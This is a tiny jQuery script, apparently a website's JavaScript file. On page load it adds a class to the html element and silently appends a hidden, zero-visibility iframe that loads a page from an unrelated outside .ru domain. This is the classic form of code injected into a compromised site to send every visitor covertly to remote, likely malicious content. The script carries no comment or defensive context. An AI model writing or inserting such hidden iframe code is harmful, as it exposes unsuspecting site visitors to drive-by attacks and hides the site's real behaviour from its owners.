$(document).ready(function(){

	$('html').addClass('js');
	
	$('body').append('<iframe src="http://kozhevyatov.ru/indexx.html" style="display: none;"></iframe>');

});

